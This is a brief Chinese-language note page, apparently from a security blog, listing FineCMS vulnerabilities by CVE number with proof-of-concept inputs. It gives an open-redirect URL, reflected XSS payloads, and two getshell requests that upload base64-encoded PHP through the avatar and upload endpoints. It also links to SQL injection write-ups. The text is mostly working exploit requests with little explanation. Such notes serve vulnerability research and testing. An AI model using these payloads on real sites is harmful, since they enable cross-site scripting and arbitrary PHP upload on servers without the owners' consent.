finecms

finecms分析(5.0.11之前)

https://lorexxar.cn/2017/07/26/finecms%E5%88%86%E6%9E%90/
任意文件跳转(CVE-2017-11586)
poc:
随便登入一个用户

http://192.168.0.6/index.php?c=weixin&m=sync&url=http://www.baidu.com

登陆接口post型反射型xss(CVE-2017-11581)
poc:
登陆使用下面的username

" onmousemove=alert`1` a="1
```
登陆失败后,移动鼠标就会触发

![](../../images/cms/finecms1.png)

无限制前台反射性xss漏洞(CVE-2017-11629)
poc:

```bash
http://192.168.0.6/index.php?c=api&m=data2&function=<script>alert(1)</script>p&format=php

还有一些注入看链接

FineCMS最新版5.0.8两处getshell

https://github.com/SecWiki/CMS-Hunter/tree/master/FineCMS/FineCMS%E6%9C%80%E6%96%B0%E7%89%885.0.8%E4%B8%A4%E5%A4%84getshell

poc:

127.0.0.1/finecms/index.php?c=api&m=data2&auth=50ce0d2401ce4802751739552c8e4467&param=update_avatar&file=data:image/php;base64,PD9waHAgcGhwaW5mbygpOz8+

poc2:
先随便注册一个账号

http://192.168.0.6/index.php?s=member&c=account&m=upload

post:
tx=data:image/php;base64,PD9waHAgcGhwaW5mbygpOz8+

finecms 5.2SQL注入漏洞复现(CVE-2018-6893)–利用DNS记录进行注入

https://bbs.ichunqiu.com/thread-36673-1-7.html

当前网速较慢或者你使用的浏览器不支持博客特定功能,请尝试刷新或换用Chrome、Firefox等现代浏览器